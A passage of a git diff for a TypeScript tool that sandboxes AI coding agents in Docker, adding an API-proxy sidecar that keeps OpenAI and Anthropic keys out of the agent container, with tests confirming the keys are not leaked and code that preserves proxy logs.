+ } finally {
+ if (origKey !== undefined) {
+ process.env.CODEX_API_KEY = origKey;
+ } else {
+ delete process.env.CODEX_API_KEY;
+ }
+ }
+ });
+
+ it('should not leak OPENAI_API_KEY to agent when api-proxy is enabled with envAll', () => {
+ // Simulate envAll scenario (smoke-codex uses --env-all)
+ const origKey = process.env.OPENAI_API_KEY;
+ process.env.OPENAI_API_KEY = 'sk-openai-secret';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-openai-secret', envAll: true };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+      const env = agent.environment as Record<string, string>;
+ // Even with envAll, agent should NOT have OPENAI_API_KEY when api-proxy is enabled
+ expect(env.OPENAI_API_KEY).toBeUndefined();
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
+ } finally {
+ if (origKey !== undefined) {
+ process.env.OPENAI_API_KEY = origKey;
+ } else {
+ delete process.env.OPENAI_API_KEY;
+ }
+ }
+ });
+
+ it('should not leak ANTHROPIC_API_KEY to agent when api-proxy is enabled with envAll', () => {
+ const origKey = process.env.ANTHROPIC_API_KEY;
+ process.env.ANTHROPIC_API_KEY = 'sk-ant-secret';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, anthropicApiKey: 'sk-ant-secret', envAll: true };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+      const env = agent.environment as Record<string, string>;
+ // Even with envAll, agent should NOT have ANTHROPIC_API_KEY when api-proxy is enabled
+ expect(env.ANTHROPIC_API_KEY).toBeUndefined();
+ expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ // But should have placeholder token for Claude Code compatibility
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
} finally {
if (origKey !== undefined) {
process.env.ANTHROPIC_API_KEY = origKey;
diff --git a/src/docker-manager.ts b/src/docker-manager.ts
index 68d85507..5610729d 100644
--- a/src/docker-manager.ts
+++ b/src/docker-manager.ts
@@ -242,6 +242,12 @@ export function generateDockerCompose(
// Squid logs path: use proxyLogsDir if specified (direct write), otherwise workDir/squid-logs
const squidLogsPath = config.proxyLogsDir || `${config.workDir}/squid-logs`;
+ // API proxy logs path: if proxyLogsDir is specified, write to sibling directory
+ // Otherwise, write to workDir/api-proxy-logs (will be moved to /tmp after cleanup)
+ const apiProxyLogsPath = config.proxyLogsDir
+ ? path.join(path.dirname(config.proxyLogsDir), 'api-proxy-logs')
+ : path.join(config.workDir, 'api-proxy-logs');
+
// Build Squid volumes list
const squidVolumes = [
`${config.workDir}/squid.conf:/etc/squid/squid.conf:ro`,
@@ -320,6 +326,16 @@ export function generateDockerCompose(
'SUDO_GID', // Sudo metadata
]);
+ // When api-proxy is enabled, exclude API keys from agent environment
+ // (they are held securely in the api-proxy sidecar instead)
+ // Note: CODEX_API_KEY is intentionally NOT excluded - Codex needs direct credential access
+ if (config.enableApiProxy) {
+ EXCLUDED_ENV_VARS.add('OPENAI_API_KEY');
+ EXCLUDED_ENV_VARS.add('OPENAI_KEY');
+ EXCLUDED_ENV_VARS.add('ANTHROPIC_API_KEY');
+ EXCLUDED_ENV_VARS.add('CLAUDE_API_KEY');
+ }
+
// Start with required/overridden environment variables
// Use the real user's home (not /root when running with sudo)
const homeDir = getRealUserHome();
@@ -400,8 +416,11 @@ export function generateDockerCompose(
if (process.env.GITHUB_TOKEN) environment.GITHUB_TOKEN = process.env.GITHUB_TOKEN;
if (process.env.GH_TOKEN) environment.GH_TOKEN = process.env.GH_TOKEN;
if (process.env.GITHUB_PERSONAL_ACCESS_TOKEN) environment.GITHUB_PERSONAL_ACCESS_TOKEN = process.env.GITHUB_PERSONAL_ACCESS_TOKEN;
- // Anthropic API key for Claude Code - skip when api-proxy is enabled
- // (the sidecar holds the key; the agent uses ANTHROPIC_BASE_URL instead)
+ // API keys for LLM providers - skip when api-proxy is enabled
+ // (the sidecar holds the keys; the agent uses *_BASE_URL instead)
+ // Exception: CODEX_API_KEY is always passed through for Codex agent compatibility
+ if (process.env.OPENAI_API_KEY && !config.enableApiProxy) environment.OPENAI_API_KEY = process.env.OPENAI_API_KEY;
+ if (process.env.CODEX_API_KEY) environment.CODEX_API_KEY = process.env.CODEX_API_KEY;
if (process.env.ANTHROPIC_API_KEY && !config.enableApiProxy) environment.ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
if (process.env.USER) environment.USER = process.env.USER;
if (process.env.TERM) environment.TERM = process.env.TERM;
@@ -531,6 +550,24 @@ export function generateDockerCompose(
// This is safe as ~/.claude contains only Claude-specific state, not credentials
agentVolumes.push(`${effectiveHome}/.claude:/host${effectiveHome}/.claude:rw`);
+ // Mount ~/.claude.json for Claude Code authentication configuration
+ // This file must be accessible in chroot mode for Claude Code to find apiKeyHelper
+ // We create the file if it doesn't exist, then mount it
+ const claudeJsonPath = path.join(effectiveHome, '.claude.json');
+ if (!fs.existsSync(claudeJsonPath)) {
+ // Create parent directory if needed
+ const parentDir = path.dirname(claudeJsonPath);
+ if (!fs.existsSync(parentDir)) {
+ fs.mkdirSync(parentDir, { recursive: true, mode: 0o755 });
+ }
+ // Create empty file that will be populated by entrypoint
+ // Use 0o666 mode to allow container root to write and host user to read
+ // The entrypoint script runs as root and modifies this file
+ fs.writeFileSync(claudeJsonPath, '{}', { mode: 0o666 });
+ logger.debug(`Created ${claudeJsonPath} for chroot mounting`);
+ }
+ agentVolumes.push(`${claudeJsonPath}:/host${claudeJsonPath}:rw`);
+
// Mount ~/.cargo and ~/.rustup for Rust toolchain access
// On GitHub Actions runners, Rust is installed via rustup at $HOME/.cargo and $HOME/.rustup
// ~/.cargo must be rw because the credential-hiding code mounts /dev/null over
@@ -919,6 +956,10 @@ export function generateDockerCompose(
ipv4_address: networkConfig.proxyIp,
},
},
+ volumes: [
+ // Mount log directory for api-proxy logs
+ `${apiProxyLogsPath}:/var/log/api-proxy:rw`,
+ ],
environment: {
// Pass API keys securely to sidecar (not visible to agent)
...(config.openaiApiKey && { OPENAI_API_KEY: config.openaiApiKey }),
@@ -968,13 +1009,24 @@ export function generateDockerCompose(
// Use IP address instead of hostname for BASE_URLs since Docker DNS may not resolve
// container names in chroot mode
environment.AWF_API_PROXY_IP = networkConfig.proxyIp;
- if (config.openaiApiKey) {
- environment.OPENAI_BASE_URL = `http://${networkConfig.proxyIp}:10000`;
- logger.debug(`OpenAI API will be proxied through sidecar at http://${networkConfig.proxyIp}:10000`);
- }
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ // if (config.openaiApiKey) {
+ // environment.OPENAI_BASE_URL = `http://${networkConfig.proxyIp}:10000/v1`;
+ // logger.debug(`OpenAI API will be proxied through sidecar at http://${networkConfig.proxyIp}:10000/v1`);
+ // }
if (config.anthropicApiKey) {
environment.ANTHROPIC_BASE_URL = `http://${networkConfig.proxyIp}:10001`;
logger.debug(`Anthropic API will be proxied through sidecar at http://${networkConfig.proxyIp}:10001`);
+
+ // Set placeholder token for Claude Code CLI compatibility
+ // Real authentication happens via ANTHROPIC_BASE_URL pointing to api-proxy
+ environment.ANTHROPIC_AUTH_TOKEN = 'placeholder-token-for-credential-isolation';
+ logger.debug('ANTHROPIC_AUTH_TOKEN set to placeholder value for credential isolation');
+
+ // Set API key helper for Claude Code CLI to use credential isolation
+ // The helper script returns a placeholder key; real authentication happens via ANTHROPIC_BASE_URL
+ environment.CLAUDE_CODE_API_KEY_HELPER = '/usr/local/bin/get-claude-key.sh';
+ logger.debug('Claude Code API key helper configured: /usr/local/bin/get-claude-key.sh');
}
logger.info('API proxy sidecar enabled - API keys will be held securely in sidecar container');
@@ -1027,6 +1079,20 @@ export async function writeConfigs(config: WrapperConfig): Promise {
}
logger.debug(`Squid logs directory created at: ${squidLogsDir}`);
+ // Create api-proxy logs directory for persistence
+ // If proxyLogsDir is specified, write to sibling directory (timeout-safe)
+ // Otherwise, write to workDir/api-proxy-logs (will be moved to /tmp after cleanup)
+ // Note: API proxy runs as user 'apiproxy' (non-root)
+ const apiProxyLogsDir = config.proxyLogsDir
+ ? path.join(path.dirname(config.proxyLogsDir), 'api-proxy-logs')
+ : path.join(config.workDir, 'api-proxy-logs');
+ if (!fs.existsSync(apiProxyLogsDir)) {
+ fs.mkdirSync(apiProxyLogsDir, { recursive: true, mode: 0o777 });
+ // Explicitly set permissions to 0o777 (not affected by umask)
+ fs.chmodSync(apiProxyLogsDir, 0o777);
+ }
+ logger.debug(`API proxy logs directory created at: ${apiProxyLogsDir}`);
+
// Create /tmp/gh-aw/mcp-logs directory
// This directory exists on the HOST for MCP gateway to write logs
// Inside the AWF container, it's hidden via tmpfs mount (see generateDockerCompose)
@@ -1453,6 +1519,33 @@ export async function cleanup(workDir: string, keepFiles: boolean, proxyLogsDir?
}
}
+ // Preserve api-proxy logs before cleanup
+ if (proxyLogsDir) {
+ // Logs were written directly to sibling of proxyLogsDir during runtime (timeout-safe)
+ // Just fix permissions so they're readable
+ const apiProxyLogsDir = path.join(path.dirname(proxyLogsDir), 'api-proxy-logs');
+ if (fs.existsSync(apiProxyLogsDir)) {
+ try {
+ execa.sync('chmod', ['-R', 'a+rX', apiProxyLogsDir]);
+ logger.info(`API proxy logs available at: ${apiProxyLogsDir}`);
+ } catch (error) {
+ logger.debug('Could not fix api-proxy log permissions:', error);
+ }
+ }
+ } else {
+ // Default behavior: move from workDir/api-proxy-logs to timestamped /tmp directory
+ const apiProxyLogsDir = path.join(workDir, 'api-proxy-logs');
+ const apiProxyLogsDestination = path.join(os.tmpdir(), `api-proxy-logs-${timestamp}`);
+ if (fs.existsSync(apiProxyLogsDir) && fs.readdirSync(apiProxyLogsDir).length > 0) {
+ try {
+ fs.renameSync(apiProxyLogsDir, apiProxyLogsDestination);
+ logger.info(`API proxy logs preserved at: ${apiProxyLogsDestination}`);
+ } catch (error) {
+ logger.debug('Could not preserve api-proxy logs:', error);
+ }
+ }
+ }
+
// Handle squid logs
if (proxyLogsDir) {
// Logs were written directly to proxyLogsDir during runtime (timeout-safe)
diff --git a/src/types.ts b/src/types.ts
index bf73cbbc..ece8415d 100644
--- a/src/types.ts
+++ b/src/types.ts
@@ -396,8 +396,9 @@ export interface WrapperConfig {
*
* When the corresponding API key is provided, the following environment
* variables are set in the agent container:
- * - OPENAI_BASE_URL=http://api-proxy:10000 (set when OPENAI_API_KEY is provided)
+ * - OPENAI_BASE_URL=http://api-proxy:10000/v1 (set when OPENAI_API_KEY is provided)
* - ANTHROPIC_BASE_URL=http://api-proxy:10001 (set when ANTHROPIC_API_KEY is provided)
+ * - CLAUDE_CODE_API_KEY_HELPER=/usr/local/bin/get-claude-key.sh (set when ANTHROPIC_API_KEY is provided)
*
* API keys are passed via environment variables:
* - OPENAI_API_KEY - Optional OpenAI API key for Codex
diff --git a/tests/integration/api-proxy.test.ts b/tests/integration/api-proxy.test.ts
index 475fcb98..5fc24164 100644
--- a/tests/integration/api-proxy.test.ts
+++ b/tests/integration/api-proxy.test.ts
@@ -85,6 +85,25 @@ describe('API Proxy Sidecar', () => {
expect(result.stdout).toContain(`ANTHROPIC_BASE_URL=http://${API_PROXY_IP}:10001`);
}, 180000);
+ test('should set ANTHROPIC_AUTH_TOKEN to placeholder in agent when Anthropic key is provided', async () => {
+ const result = await runner.runWithSudo(
+ 'bash -c "echo ANTHROPIC_AUTH_TOKEN=$ANTHROPIC_AUTH_TOKEN"',
+ {
+ allowDomains: ['api.anthropic.com'],
+ enableApiProxy: true,
+ buildLocal: true,
+ logLevel: 'debug',
+ timeout: 120000,
+ env: {
+ ANTHROPIC_API_KEY: 'sk-ant-fake-test-key-12345',
+ },
+ }
+ );
+
+ expect(result).toSucceed();
+ expect(result.stdout).toContain('ANTHROPIC_AUTH_TOKEN=placeholder-token-for-credential-isolation');
+ }, 180000);
+
test('should set OPENAI_BASE_URL in agent when OpenAI key is provided', async () => {
const result = await runner.runWithSudo(
'bash -c "echo OPENAI_BASE_URL=$OPENAI_BASE_URL"',